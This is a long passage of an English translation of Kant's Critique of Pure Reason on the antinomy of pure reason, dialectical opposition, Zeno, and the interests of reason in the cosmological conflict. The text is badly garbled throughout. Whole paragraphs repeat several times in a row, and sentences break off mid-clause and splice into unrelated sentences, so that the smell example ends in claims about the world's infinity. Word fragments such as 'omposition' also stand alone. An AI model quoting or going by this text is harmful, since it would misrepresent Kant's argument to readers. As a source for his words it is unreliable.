Thus the antinomy of pure reason in its cosmological ideas vanishes when it is shown that it is merely dialectical, and that it is a conflict due to an illusion which arises from our applying to appearances that exist only in our representations, and therefore, so far as they form a series, not otherwise than in a successive regress, that idea of absolute totality which holds only as a condition of things in themselves. From this antinomy we can, however, obtain, not indeed a dogmatic, but a critical and doctrinal advantage. It affords indirect proof of the transcendental ideas of the world itself, in its totality. The assertions of the thesis, on the other hand, pre-suppose, in addition to the empirical mode of explanation employed within the series of appearances, is a thing in itself that remains even if I suspend the infinite or the finite regress in the series of its appearances. If, however, I reject this assumption, or rather this accompanying transcendental illusion, and deny that the world is a thing in itself, we could indeed say that it exists in itself apart from relation to our senses and possible experience. But we are here speaking only of an appearance in space and time, which are not determinations of things in themselves. From this antinomy we can, however, obtain, not indeed a dogmatic, but a critical and doctrinal advantage. It affords indirect proof of the transcendental ideality of appearances — a proof which ought to convince any who may not be satisfied by the direct proof given in the Transcendental Aesthetic. This proof would consist in the following dilemma. If the world is a whole existing in itself, it is either finite or infinite. But both alternatives are false (as shown in the proofs of the antithesis and thesis respectively). It is therefore also false that the world (the sum of all appearances) is a whole existing in itself. From this it then follows that appearances in general are nothing outside our representations — which is just what is meant by their transcendental ideality.

This remark is of some importance. It enables us to see that the proofs given in the fourfold antinomy are not merely baseless deceptions. On the supposition that appearances, and the sensible world which comprehends them all, are things in themselves, these proofs are indeed well-grounded. The conflict which results from the propositions thus obtained shows, however, that there is a fallacy in this assumption, and so leads us to the discovery of the true constitution of things, as objects of the senses. While the transcendental dialectic does not by any means favour scepticism, it certainly does favour the sceptical method, which can point to such dialectic as an example of its great services. For when the arguments of reason are allowed to oppose one another in unrestricted freedom, something advantageous, and likely to aid in the correction of our judgments, will always accrue, though it may not be what we set out to find. omposition can ever come before us. Appearances demand explanation only so far as the conditions of their explanation are given in perception; but all that may ever be given in this way, when taken together in an absolute whole, is not itself a perception. Yet it is just the explanation of this very whole that is demanded in the transcendental problems of reason.

Thus the solution of these problems can never be found in experience, and this is precisely the reason why we should not say that it is uncertain what should be ascribed to the object, and that while we do indeed have a concept sufficient to raise a question, we are entirely lacking in materials or power to answer the same.

Now I maintain that transcendental philosophy is unique in the whole field of speculative knowledge, in that no question which concerns an object given to pure reason can be insoluble for this same human reason, and that no excuse of an unavoidable ignorance, or of the problem's unfathomable depth, can release us from the obligation to answer it thoroughly and completely. That very concept which puts us in a position to ask the question must also qualify us to answer it, since, as in the case of right and wrong, the object is not to be met with outside the concept.

In transcendental philosophy, however, the only questions to which we have the right to demand a sufficient answer bearing on the constitution of the object] must refer exclusively to cosmological ideas. For the object must be given empirically, the question being only as to its conformity to an idea. If, on the other hand, the object is transcendental, and therefore itself unknown; if, for instance, the question be whether that something, the appearance of which (in ourselves) is thought (soul), is in itself a simple being, whether there is an absolutely necessary cause of all things, and so forth, what we have then to do is in each case to seek an object for our idea; and we may well confess that this object is unknown to us, though not therefore impossible.

[Although to the question, what is the constitution of a transcendental object, no answer can be given stating what it is, we can yet reply that the question itself is nothing, because there is no given object corresponding to it. Accordingly all questions dealt with in the transcendental doctrine of the soul are answerable in this latter manner, and have indeed been so answered; its questions refer to the transcendental subject of all inner appearances, which is not itself appearance and consequently not given as object, and in which none of the categories (and it is to them that the question is really directed) meet with the conditions required for their application. We have here a case where the common saying holds, that no answer is itself an answer. A question as to the constitution of the object, and from answering which the philosopher is not permitted to excuse himself on the plea of their impenetrable obscurity, are the cosmological.

These questions [bearing on the constitution of the object, and from answering which the philosopher is not permitted to excuse himself on the plea of their impenetrable obscurity, are the cosmological.

These questions [bearing on the constitution of the object, and from answering which the philosopher is not permitted to excuse himself on the plea of their impenetrable obscurity, are the cosmological.

These questions [bearing on the constitution of the object, and from answering which the philosopher is not permitted to excuse himself on the plea of their impenetrable obscurity, are the cosmological.

These questions [bearing on the constitution of the object, and from answering which the philosopher is not permitted to excuse himself on the plea of their impenetrable obscurity, are the cosmological.

These questions [bearing on the constitution of that something which cannot be thought through any determinate predicate — inasmuch as it is completely outside the sphere of those objects which can be given to us — is entirely null and void.]

The cosmological ideas alone have the peculiarity that they can presuppose their object, and the empirical synthesis required for its concept, as being given. The question which arises out of these ideas refers only to the advance in this synthesis, that is, whether it should be carried so far as to contain absolute totality — such totality, since it cannot be given in any experience, being no longer empirical. Since we are here dealing solely with a thing as object of a possible experience, not as a thing in itself, the answer to the transcendent cosmological question cannot lie anywhere save in the idea. We are not asking what is the constitution of a transcendental object, no answer can be given stating what it is, we can yet reply that the question itself is nothing, because there is no other thing, nothing outside it, with which it could be compared. If two opposed judgments presuppose an inadmissible condition, then in spite of their opposition, which does not amount to a contradiction strictly so-called, both fall to the ground, inasmuch as the condition, under which alone either of them can be maintained, itself falls.

If it be said that all bodies have either a good smell or a smell that is not good, a third case is possible, namely, that a body has no smell at all; and both the conflicting propositions may therefore be false. If, however, I say: all bodies are either good-smelling or not good-smelling (vel suaveolens vel non suaveolens), the two judgments are directly contradictory to one another, and the former only is false, its contradictory opposite, that the world is not infinite, must be true. And I should thus deny the existence of an infinite world, without affirming in its place a finite world. But if we had said that the world is either infinite in extension or is not infinite (non est infinitus), and if the former proposition is false, its contradictory opposite, namely, that some bodies are not good-smelling, comprehending those bodies also which have no smell at all.

Since, in the previous opposition (per disparata), smell, the contingent condition of the concept of the body, was not removed by the opposed judgment, but remained attached to it, the two judgments were not related as contradictory opposites.

If, therefore, we say that the world is either infinite in extension or is not infinite (non est infinitus), and if the former proposition is false, its contradictory opposite, namely, that some bodies are not good-smelling, comprehending those bodies also which have no smell at all.

Since, in the previous opposition (per disparata), smell, the contingent condition of the concept of the body, was not removed by the opposed judgment, but remained attached to it, the two judgments are directly contradictory to one another, and the former only is false, its contradictory opposite, namely, that some bodies are not good-smelling, comprehending those bodies also which have no smell at all.

Since, in the previous opposition (per disparata), smell, the contingent condition of the concept of the body, was not removed by the opposed judgment we do not merely remove the infinitude, and with it perhaps the entire separate existence of the world, but attach a determination to the world, regarded as a thing actually existing in itself. This assertion may, however, likewise be false; the world may not be given as a thing in itself, nor as being in its magnitude either infinite or finite. I beg permission to entitle this kind of opposition dialectical, and that of contradictories analytical. Thus of two dialectically opposed judgments both may be false; for the one is not a mere contradictory of the other, but says something more than is required for a simple contradiction.

If we regard the two propositions, that the world is infinite in magnitude and that it is finite in magnitude, as contradictory opposites, we are assuming that the world, the complete series of appearances, is a thing in itself that remains even if I suspend the infinite or the finite regress in the series of its appearances. If, however, I reject this assumption, or rather this accompanying transcendental illusion, and deny that the world is a thing in itself, the contradictory opposition of the two assertions is converted into a merely dialectical opposition. Since the world does not exist in itself, independently of the regressive series of my representations, it exists in itself neither as an infinite whole nor as a finite whole. It exists only in the empirical regress of the series of appearances, and is not to be met with outside the concept.

In transcendental philosophy, however, the only questions to which we have the right to demand a sufficient answer bearing on the constitution of the object] must refer exclusively to cosmological ideas. For the object must be given empirically, the question being only as to its conformity to an idea. If, on the other hand, the object is transcendental, and therefore itself unknown; if, for instance, the question be whether that something, the appearance of which (in ourselves) is thought (soul), is in itself a simple being, whether there is an absolutely necessary cause of all things, and so forth, what we have then to do is in each case to seek an object for our idea; and we may well confess that this object is unknown to us, though not therefore impossible.

[Although to the question, what is the constitution of a transcendental object, no answer can be given stating what it is, we can yet reply that the question itself is nothing, because there is no given object corresponding to it. Accordingly all questions dealt with in the transcendental doctrine of the soul are answerable in this latter manner, and have indeed been so answered; its questions refer to the transcendental dialectic does not by any means favour scepticism, it certainly does favour the sceptical method, which can point to such dialectic as an example of its great services. For when the arguments of reason are allowed to oppose one another in unrestricted freedom, something advantageous, and likely to aid in the correction of our judgments, will always accrue, though it may not be what we set out to find. directly interested in the matters in dispute. Accordingly, nothing remains for reason save to consider whether the origin of this conflict, whereby it is divided against itself, may not have arisen from a mere misunderstanding. In such an enquiry both parties, per chance, may have to sacrifice proud claims; but a lasting and peaceful reign of reason over understanding and the senses would thereby be inaugurated.

For the present we shall defer this thorough enquiry, in order first of all to consider upon which side we should prefer to fight, should we be compelled to make choice between the opposing parties. The raising of this question, how we should proceed if we consulted only our interest and not the logical criterion of truth, will decide nothing in regard to the contested rights of the two parties, but has this advantage, that it enables us to comprehend why the participants in this quarrel, though not influenced by any superior insight into the matter under dispute, have preferred to fight on one side rather than on the other. It will also cast light on a number of incidental points, for instance, the passionate zeal of the one party and the calm assurance of the other; and will explain why the world hails the one with eager approval, and is implacably prejudiced against the other.

Comparison of the principles which form the starting-points of the two parties is what enables us, as we shall find, to determine the standpoint from which alone this preliminary enquiry can be carried out with the required thoroughness. In the assertions of the antithesis we observe a perfect uniformity in manner of thinking and complete unity of maxims, namely a principle of pure empiricism, applied not only in explanation of the appearances within the world, but also in the solution of the transcendental ideas of the world itself, in its totality. The assertions of the thesis, on the other hand, pre-suppose, in addition to the empirical mode of explanation employed within the series of appearances, is a thing in itself that remains even if I suspend the infinite or the finite regress in the series of its appearances. If, however, I reject this assumption, or rather this accompanying transcendental illusion, and deny that the world is a thing in itself, the contradictory opposition of the two assertions is converted into a merely dialectical opposition. Since the world does not exist in itself, independently of the regressive series of my representations, it exists in itself neither as an infinite whole nor as a finite whole. It exists only in the empirical regress of the series of appearances, and is not to be met with as something in itself. If, then, this series is always conditioned, and therefore can never be given as complete, the world is not an unconditioned whole, and does not exist as such a whole, either of infinite or of finite magnitude.

What we have here said of the first cosmological idea, that is, of the absolute totality of the synthesis and of the series thereby represented. In the major premise all the members of the series. The above proposition is thus analytic, and has nothing to fear from a transcendental criticism. It is a logical postulate of reason, that through the understanding we follow up and extend as far as possible that connection of a concept with its conditions which directly results from the concept itself.

Further, if the conditioned as well as its condition are things in themselves, then upon the former being given, the regress to the latter is not only set as a task, but therewith already really given. And since this holds of all members of the series, the complete series of the conditions, and therefore, so far as they form a series, not otherwise than in a successive regress, that idea of absolute totality which holds only as a condition of things in themselves. From this antinomy we can, however, obtain, not indeed a dogmatic, but a critical and doctrinal advantage. It affords indirect proof of the transcendental ideas are postulated and employed in the manner prescribed by the thesis, the entire chain of conditions and the derivation of the conditioned can be grasped completely a priori. For we then start from the unconditioned. This is not done by the antithesis, which for this reason is at a very serious disadvantage. To the question as to the conditions of its synthesis it can give no answer which does not lead to the endless renewal of the same enquiry.

According to the antithesis, every given beginning compels us to advance to one still higher; every part leads to a still smaller part; every event is preceded by another event as its cause; and the conditions of existence in general rest always again upon other conditions, without ever obtaining unconditioned footing and support in any self-subsistent thing, viewed as primordial being.

Thirdly, the thesis has also the advantage of popularity; and this certainly forms no small part of its claim to favour.

The common understanding finds not the least difficulty in the idea of the unconditioned beginning of all synthesis. Being more accustomed to descend to consequences than to ascend to grounds, it does not puzzle over the possibility of the absolutely first; on the contrary, it finds comfort in such concepts, and at the same time a fixed point to which the thread by which it guides its movements can be attached. In the restless ascent from the conditioned to the condition, always with one foot in the air, there can be no satisfaction.

In the determination of the cosmological ideas, we find on the side of dogmatism, that is, of the thesis: First, a certain practical interest in which every right-thinking man, if he has understanding of what truly concerns him, heartily shares. That the world has a beginning and the other that it has no beginning and is from eternity, one of the two must be in the right. But even if this be so, none the less, since the arguments on both sides are equally clear, it is impossible to decide between them. The parties may be commanded to keep the peace before the tribunal of reason; but the controversy none the less continues. There can therefore be no way of settling it once for all and to the satisfaction of both sides, save by their becoming convinced that the very fact of their being able so admirably to refute one another is evidence that they are really quarrelling about nothing, and that a certain transcendental illusion has mocked them with a reality where none is to be found. This is the path which we shall now proceed to follow in the settlement of a dispute that defies all attempts to come to a decision.
* * *

Zeno of Elea, a subtle dialectician, was severely reprimanded by Plato as a mischievous Sophist who, to show his skill, would set out to prove a proposition through convincing arguments and then immediately overthrow them by other arguments equally strong. Zeno maintained, for example, that God (probably conceived by him as simply the world) is neither finite nor infinite, neither in motion nor at rest, neither similar nor dissimilar to any other thing. To the critics of his procedure he appeared to have the absurd intention of denying both of two mutually contradictory propositions. But this accusation does not seem to me to be justified. The first of his propositions I shall consider presently more in detail. As regards the others, if by the word 'God' he meant the universe, he would certainly have to say that it is neither abidingly present in its place, that is, at rest, nor that it changes its place, that is, is in motion; because all places are in the universe, and the universe is not, therefore, itself in any place. Again, if the universe comprehends in itself everything that exists, it cannot be either similar or dissimilar to any other thing. To the critics of his procedure he appeared to have the absurd intention of denying both of two mutually contradictory propositions. But this accusation does not seem to me to be justified. The first of his propositions I shall consider presently more in detail. As regards the others, if by the word 'God' he meant the universe, he would certainly have to say that it is neither abidingly present in its place, that is, at rest, nor that it changes its place, that is, is in motion; because all places are in the universe, and the universe is not, therefore, itself in any place. Again, if the universe comprehends in itself everything that exists, it cannot be either similar or dissimilar to any other thing. To the critics of his procedure he appeared to have the absurd intention of denying both of two mutually contradictory propositions. But this accusation does not seem to me to be justified. The first of his propositions I shall consider presently more in detail. As regards the others, if by the word 'God' he meant the universe, he would certainly have to say that it is neither abidingly present in its place, that is, at rest, nor that it changes its place, that is, is in motion; because all places are in the universe, and the universe is not, therefore, itself in any place. Again, if the universe comprehends in itself everything that exists, it cannot be either similar or dissimilar to any other thing, because there is no other thing, nothing outside it, with which it could be compared. If two opposed judgments presuppose an inadmissible condition, then in spite of their opposition, which does not amount to a contradiction strictly so-called, both fall to the ground, inasmuch as the condition, under which alone either of them can be maintained, itself falls.

If it be said that all bodies have either a good smell or a smell that is not good, a third case is possible, namely, that a body has no smell at all; and both the conflicting propositions may therefore be false. If, however, I say: all bodies are either good-smelling or not good-smelling (vel suaveolens vel non suaveolens), the two judgments are directly contradictory to one another, and the former only is false, its contradictory opposite, that the world is not infinite, must be true. And I should thus deny the existence of an infinite world, without affirming in its place a finite world. But if we had said that the world is either infinite in extension or is not infinite (non est infinitus), and if the former proposition is false, its contradictory opposite, namely, that some bodies are not good-smelling, comprehending those bodies also which have no smell at all.

Since, in the previous opposition (per disparata), smell, the contingent condition of the concept of the body, was not removed by the opposed judgment, but remained attached to it, the two judgments were not related as contradictory opposite, namely, that some bodies are not good-smelling, comprehending those bodies also which have no smell at all.

Since, in the previous opposition (per disparata), smell, the contingent condition of the concept of the body, was not removed by the opposed judgment, but remained attached to it, the two judgments were not related as contradictory opposites.

If, therefore, we say that the world is a thing in itself, the answer to the transcendent cosmological question cannot lie anywhere save in the idea. We are not asking what is the constitution of any object in itself, nor as regards possible experience are we enquiring what can be given in concreto in any experience. Our sole question is as to what lies in the idea, to which the empirical synthesis can do no more than merely approximate; the question must therefore be capable of being solved entirely from the idea.

Since the idea is a mere creature of reason, reason cannot disclaim its responsibility and saddle it upon the unknown object.

It is not so extraordinary as at first seems the case, that a science should be in a position to demand and expect none but assured answers to all the questions within its domain (quaestiones domesticae), although up to the present they have perhaps not been found. In addition to transcendental philosophy, they have been divested of all empirical features, although only in connection therewith can their full splendour be displayed. But in this empirical application, and in the progressive extension of the employment of reason that is extended beyond all experience, and at the same time a fixed point to which the thread by which it guides its movements can be attached. In the restless ascent from the conditioned to the condition, always with one foot in the air, there can be no satisfaction.

In the determination of the cosmological ideas we find on the side of empiricism, that is, of the antithesis: first, no such practical interest (due to pure principles of reason) as is provided for the thesis by morals and religion. On the contrary, pure empiricism appears to deprive them of all power and influence. If there is no primordial being distinct from the world, if the world is without beginning and therefore without an Author, if our will is not free, and the soul is divisible and perishable like matter, moral ideas and principles lose all validity, and share in the fate of the transcendental ideality of appearances — a proof which ought to convince any who may not be satisfied by the direct proof given in the Transcendental Analytic which concern the deduction of our pure knowledge; we are at present treating only of the certainty of judgments with respect to their objects and not with respect to the source of our concepts themselves.

The obligation of an at least critical solution of the questions which reason thus propounds to itself, we cannot, therefore, escape by complaints of the narrow limits of our reason, and by confessing, under the pretext of a humility based on self-knowledge, that it is beyond the power of our reason to determine whether the world exists from eternity or has a beginning; whether cosmical space is filled with beings to infinitude, or is enclosed within certain limits; whether anything in the world is simple, or everything such as to be infinitely divisible; whether there is generation and production through freedom, or whether everything depends on the chain of events in the natural order; and finally whether there exists any being completely unconditioned and necessary in itself, or whether everything is conditioned, an unconditioned and first existence being nowhere discernible. Since, therefore, the antithesis thus refuses to admit as first or as a beginning anything that could serve as a foundation for building, a complete edifice of knowledge is, on such assumptions, altogether impossible. Thus the architectonic interest of reason — the demand not for empirical but for pure a priori unity of reason — forms a natural recommendation for the assertions of the thesis.

If men could free themselves from all such interests, and consider the assertions of reason irrespective of their consequences, solely in view of the intrinsic force of their grounds, and were the only way of escape from their perplexities to give adhesion to one or other of the opposing parties, their state would be one of continuous vacillation. To-day it would be their conviction that the human will is free; tomorrow, dwelling in reflection upon the indissoluble chain of nature, they would hold that freedom is nothing but self-deception, that everything is simply nature. If, however, they were summoned to action, this play of the merely speculative reason would, like a dream, at once cease, and they would choose their principles exclusively in accordance with practical interest (due to pure principles of reason) as is provided for the thesis by morals and religion. On the contrary, pure empiricism appears to deprive them of all power and influence. If there is no primordial being distinct from the world, if the world is without beginning and therefore without an Author, if our will is not free, and the soul is divisible and perishable like matter, moral ideas and principles lose all validity, and share in the fate of the transcendental ideas which served as their theoretical support.

But secondly, in compensation, empiricism yields advantages to the speculative interest of reason, which are very attractive and far surpass those which dogmatic teaching bearing on the ideas of reason can offer. According to the principle of empiricism the understanding is always on its own proper ground, namely, the field of genuinely possible experiences, investigating their laws, and by means of these laws affording indefinite extension to the sure and comprehensible knowledge which it supplies. Here every object, both in itself and in its relations, can and ought to be represented in intuition, or at least in concepts for which the corresponding images can be clearly and distinctly provided in given similar intuitions. There is no necessity to leave the chain of the natural order and to resort to ideas, the objects of which are not known, because, as mere thought-entities, they can never be given. Indeed, the understanding is not permitted to excuse himself on the plea of their impenetrable obscurity, are the cosmological.

These questions [bearing on the constitution of the object, and from answering which the philosopher is not permitted to excuse himself on the plea of their impenetrable obscurity, are the cosmological.

These questions [bearing on the constitution of the object] must refer exclusively to cosmological ideas. For the object must be given empirically, the question being only as to its conformity to an idea. If, on the other hand, the object is transcendental, and therefore itself unknown; if, for instance, the question be whether that something, the appearance of which (in ourselves) is thought (soul), is in itself a simple being, whether there is an absolutely necessary being (whether it be the world itself, or something in the world, or the cause of the world), we set it in a time infinitely remote from any given point of time, because otherwise it would be dependent upon another and antecedent being. But such an existence is then too large for our empirical concept, and is unapproachable through any regress, however far this be carried.

If, again, we hold that everything belonging to the world (whether as conditioned or as condition) is contingent, any and every given existence is too small for our concept. For we are constrained always still to look about for some other existence upon which it is dependent.

We have said that in all these cases the cosmical idea is either too large or too small relatively to something else, only if the former is required for the sake of the latter, and has to be adapted to it.

Among the puzzles propounded in the ancient dialectical Schools was the question, whether, if a ball cannot pass through a hole, we should say that the ball is too large or the hole too small. In such a case it is a matter of indifference how we choose to express ourselves, for we do not know which exists for the sake of the other. In the case, however, of a man and his coat, we do not say that a man is too tall for his coat, but that the coat is too short for the man.

We have thus been led to what is at least a well-grounded suspicion that the cosmological ideas, and with them all the mutually conflicting pseudo-rational assertions are so many attempts to solve four natural and unavoidable problems of reason. There are just so many, neither more nor fewer, owing to the fact that there are just four series of synthetic presuppositions which impose a priori limitations on the empirical synthesis.

The proud pretensions of reason, when it strives to extend its domain beyond all limits of experience, we have represented only in dry formulas that contain merely the ground of their legal claims. As befits a transcendental philosophy, they have been divested of all empirical features, although only in connection therewith can their full splendour be displayed. But in this empirical application, and in the progressive extension of the employment of reason, philosophy, beginning with the field of our experiences and steadily soaring to these lofty ideas, displays a dignity and worth such that, could it but make good its pretensions, it would leave all other human science far behind. For it promises a secure foundation for our highest expectations in respect of those ultimate ends towards which all the endeavours of reason must ultimately converge.

Whether the world has a beginning [in time] and any limit to its extension in space; whether there is anywhere, and perhaps in my thinking self, an indivisible and indestructible unity, or nothing but what is divisible and transitory; whether I am free in my actions or, like other beings, am led by the hand of nature and of fate; whether finally there is a supreme cause of the world, or whether the things of nature and their order must as the ultimate object terminate thought — an object that even in our speculations can never be transcended: these are questions for the solution of which the mathematician would gladly exchange the whole of his science. For mathematics can yield no satisfaction in regard to those highest ends that most closely concern humanity. And yet the very dignity of mathematics (that pride of human reason) rests upon this, that it guides reason to knowledge of nature in its order and regularity — alike in what is great in it and in what is small — and in the extraordinary unity of its moving forces, thus rising to a degree of insight far beyond what any philosophy based on ordinary experience would lead us to expect; and so gives occasion and encouragement to an employment of reason that is extended beyond all experience, and at the same time supplies it with the most excellent materials for supporting its investigations — so far as the character of these permits — by appropriate intuitions.

Unfortunately for speculation, though fortunately perhaps for the practical interests of humanity, reason, in the midst of its highest expectations, finds itself so compromised by the conflict of opposing arguments, that neither its honour nor its security allows it to withdraw and treat the quarrel with indifference as a mere mock fight; and still less is it in a position to command peace, being itself directly interested in the matters in dispute. Accordingly, nothing remains for reason save to consider whether the origin of this conflict, whereby it is divided against itself, may not have arisen from a mere misunderstanding. In such an enquiry both parties, per chance, may have to sacrifice proud claims; but a lasting and peaceful reign of reason over understanding and the senses would thereby be inaugurated.

For the present we shall defer this thorough enquiry, in order first of all to consider upon which side we should prefer to fight, should we be compelled to make choice between the opposing parties. The raising of this question, how we should proceed if we consulted only our interest and not the logical criterion of truth, will decide nothing in regard to the contested rights of the two parties, but has this advantage, that it enables us to comprehend why the participants in this quarrel, though not influenced by any superior insight into the matter under dispute, have preferred to fight on one side rather than on the other. It will also cast light on a number of incidental points, for instance, the passionate zeal of the one party and the calm assurance of the other; and will explain why the world hails the one with eager approval, and is implacably prejudiced against the other.

Comparison of the principles which form the starting-points of the two parties, but has this advantage, that it enables us to comprehend why the participants in this quarrel, though not influenced by any superior insight into the matter under dispute, have preferred to fight on one side rather than on the other. It will also cast light on a number of incidental points, for instance, the passionate zeal of the one party and the calm assurance of the other; and will explain why the world hails the one with eager approval, and is implacably prejudiced against the other.

Comparison of the principles which form the starting-points of the two parties is what enables us, as we shall find, to determine the standpoint from which alone this preliminary enquiry can be carried out with the required thoroughness. In the assertions of the thesis, on the other hand, pre-suppose, in addition to the empirical mode of explanation employed within the series of appearances, intelligible beginnings; and to this extent its maxim is complex. But as its essential and distinguishing characteristic is the presupposition of intelligible beginnings; and to this extent its maxim is complex. But as its essential and distinguishing characteristic is the presupposition of intelligible beginnings, I shall entitle it the dogmatism of pure reason.

In the determination of the cosmological ideas we find on the side of empiricism, that is, of the antithesis: first, no such practical interest (due to pure principles of reason) as is provided for the thesis by morals and religion. On the contrary, pure empiricism appears to deprive them of all power and influence. If there is no primordial being distinct from the world, if the world is without beginning and therefore without an Author, if our will is not free, and the soul is divisible and perishable like matter, moral ideas and principles lose all validity, and share in the fate of the transcendental ideas which served as their theoretical support.

But secondly, in compensation, empiricism yields advantages to the speculative interest of reason, which are very attractive and far surpass those which dogmatic teaching bearing on the ideas of reason can offer. According to the principle of empiricism the understanding is always on its own proper ground, namely, the field of genuinely possible experiences, investigating their laws, and by means of these laws affording indefinite extension to the sure and comprehensible knowledge which it supplies. Here every object, both in itself and in its relations, can and ought to be represented in intuition, or at least in concepts for which the corresponding images can be clearly and distinctly provided in given similar intuitions. There is no necessity to leave the chain of the natural order and to resort to ideas, the objects of which are not known, because, as mere thought-entities, they can never be given. Indeed, the understanding is not permitted to leave its proper business, and under the pretence of having brought it to completion to pass over into the sphere of idealising reason and of transcendent concepts — a sphere in which it is no longer necessary for it to observe and investigate in accordance with the laws of nature, but only to think and to invent in the assurance that it cannot be refuted by the facts of nature, not being bound by the evidence which they yield, but presuming to pass them by or even to subordinate them to a higher authority, namely, that of pure reason.

The empiricist will never allow, therefore, that any epoch of nature is to be taken as the absolutely first, or that any limit of his insight into the extent of nature is to be regarded as the widest possible. Nor does he permit any transition from the objects of nature — which he can analyse through observation and mathematics, and synthetically determine in intuition (the extended) — to those which neither sense nor imagination can ever represent in concreto (the simple). Nor will he admit the legitimacy of assuming in nature itself any power that operates independently of the laws of nature (freedom), and so of encroaching upon the business of the understanding, which is that of investigating, according to necessary rules, the origin of appearances. And, lastly, he will not grant that a cause ought ever to be sought outside nature, in an original being. We know nothing but nature, since it alone can present objects to us and instruct us in regard to their laws.

If the empirical philosopher had no other purpose in propounding his antithesis than to subdue the rashness and presumption of those who so far misconstrue the true vocation of reason as to boast of insight and knowledge just where true insight and knowledge cease, and to represent as furthering speculative interests that which is valid only in relation to practical interests (in order, as may suit their convenience, to break the thread of physical enquiries, and then under the pretence of extending knowledge to fasten it to transcendental ideas, through which we really know only that we know nothing); if, I say, the empiricist were satisfied with this, his principle would be a maxim urging moderation in our pretensions, modesty in our assertions, and yet at the same time the greatest possible extension of our understanding, through the teacher fittingly assigned to us, namely, through experience. If such were our procedure, we should not be cut off from employing intellectual presuppositions and faith on behalf of our practical interest; only they could never be permitted to assume the title and dignity of science and rational insight. Knowledge, which as such is speculative, can have no other object than that supplied by experience; if we transcend the limits thus imposed, the synthesis which seeks, independently of experience, new species of knowledge, lacks that substratum of intuition upon which alone it can be exercised.

But when empiricism itself, as frequently happens, becomes dogmatic in its attitude towards ideas, and confidently denies whatever lies beyond the sphere of its intuitive knowledge, it betrays the same lack of modesty; and this is all the more reprehensible owing to the irreparable injury which is thereby caused to the practical interests of humanity, reason, in the midst of its highest expectations, finds itself so compromised by the conflict of opposing arguments, that neither its honour nor its security allows it to withdraw and treat the quarrel with indifference as a mere mock fight; and still less is it in a position to command peace, being itself directly interested in the matters in dispute. Accordingly, nothing remains for reason save to consider whether the origin of this conflict, whereby it is divided against itself, may not have arisen from a mere misunderstanding. In such an enquiry both parties, per chance, may have to sacrifice proud claims; but a lasting and peaceful reign of reason over understanding and the senses would thereby be inaugurated.

For the present we shall defer this thorough enquiry, in order first of all to consider upon which side we should prefer to fight, should we be compelled to make choice between the opposing parties, their state would be one of continuous vacillation. To-day it would be their conviction that the human will is free; tomorrow, dwelling in reflection upon the indissoluble chain of nature, they would hold that freedom is nothing but self-deception, that everything is simply nature. If, however, they were summoned to action, this play of the merely speculative reason would, like a dream, at once cease, and they would choose their principles exclusively in accordance with practical interests. Since, however, it is fitting that a reflective and enquiring being should devote a certain amount of time to the examination of his own reason, entirely divesting himself of all partiality and openly submitting his observations to the judgment of others, no one can be blamed for, much less prohibited from, presenting for trial the two opposing parties, leaving them, terrorised by no threats, to defend themselves as best they can, before a jury of like standing with themselves, that is, before a jury of fallible men.
§ 4
THE ABSOLUTE NECESSITY OF A SOLUTION OF THE TRANSCENDENTAL PROBLEMS OF PURE REASON

To profess to solve all problems and to answer all questions would be impudent boasting, and would argue such extravagant self-conceit as at once to forfeit all confidence. Nevertheless there are sciences the very nature of which requires that every question arising within their domain should be completely answerable in terms of what is known, inasmuch as the answer must issue from the same sources from which the question proceeds. In these sciences it is not permissible to plead unavoidable ignorance; the solution can be demanded.

We must be able, in every possible case, in accordance with a rule, to know what is right and what is wrong, since this concerns our obligation, and we have no obligation to that which we cannot know. In the explanation of natural appearances, on the other hand, much must remain uncertain and many questions insoluble, because what we know of nature is by no means sufficient, in all cases, to account for what has to be explained. The question, therefore, is whether in transcendental philosophy there is any question relating to an object presented to pure reason which is unanswerable by this reason, and whether we may rightly excuse ourselves from giving a decisive answer. In thus excusing ourselves, we should have to show that any knowledge which we can acquire still leaves us in complete uncertainty as to what should be ascribed to the object, and that while we do indeed have a concept sufficient to raise a question, we are entirely lacking in materials or power to answer the same.

Now I maintain that transcendental philosophy is unique in the whole field of speculative knowledge, in that no question which concerns an object given to pure reason can be insoluble for this same human reason, and that no excuse of an unavoidable ignorance, or of the problem's unfathomable depth, can release us from the obligation to answer it thoroughly and completely. That very concept which puts us in a position to ask the question must also qualify us to answer it, since, as in the case of right and wrong, the object is not to be met with outside the concept.

In transcendental philosophy, however, the only questions to which we have the right to demand a sufficient answer bearing on the constitution of the object, and from answering which the philosopher is not permitted to excuse himself on the plea of their impenetrable obscurity, are the cosmological.

These questions [bearing on the constitution of the object] must refer exclusively to cosmological ideas. For the object must be given empirically, the question being only as to its conformity to an idea. If, on the other hand, the object is transcendental, and is therefore necessarily unknown to me. We are not, however, concerned with this transcendental object we can ascribe the whole extent and connection of our possible perceptions we always remain involved in conditions, whether in space or in time, and come upon nothing unconditioned requiring us to determine whether this unconditioned is to be located in an absolute beginning of synthesis, or in an absolute totality of a series that has no beginning.

In its empirical meaning, the term 'whole' is always only comparative. The absolute whole of quantity (the universe), the whole of division, of derivation, of the condition of existence in general, with all questions as to whether it is brought about through finite synthesis or through a synthesis requiring infinite extension, have nothing to do with any possible experience.

We should not, for instance, in any wise be able to explain the appearances of a body better, or even differently, in assuming that it consisted either of simple or of inexhaustibly composite parts; for neither a simple appearance nor an infinite composition can ever come before us. Appearances demand explanation only so far as the conditions of their explanation are given in perception; but all that may ever be given in this way, when taken together in an absolute whole, is not itself a perception. Yet it is just the explanation of this very whole that is demanded in the transcendental problems of reason.

Thus the solution of these problems can never be found in experience, and this is precisely the reason why we should not say that it is uncertain what should be ascribed to the object [of our idea]. For as our object is only in our brain, and cannot be given outside it, we have only to take care to be at one with ourselves, and to avoid that amphiboly which transforms our idea into a supposed representation of an object that is empirically given and therefore to be known according to the laws of experience. The dogmatic solution is therefore not only uncertain, but impossible. The critical solution, which allows of complete certainty, does not consider the question objectively, but in relation to the foundation of the knowledge upon which the question is based.
§ 5
SCEPTICAL REPRESENTATION OF THE COSMOLOGICAL QUESTIONS IN THE FOUR TRANSCENDENTAL IDEAS

We should of ourselves desist from the demand that our questions be answered dogmatically, if from the start we understood that whatever the dogmatic answer might turn out to be it would only increase our ignorance, and cast us from one inconceivability into another, from one obscurity into another still greater, and perhaps even into contradictions. If our question is directed simply to a yes or no, we are well advised to leave aside the supposed grounds of the answer, and first consider what we should gain according as the answer is in the affirmative or in the negative. Should we then find that in both cases the outcome is mere nonsense, there will be good reason for instituting a critical examination of our question, to determine whether the question does not itself rest on a groundless presupposition, in that it plays with an idea the falsity of which can be more easily detected through study of its application and consequences than in its own separate representation.

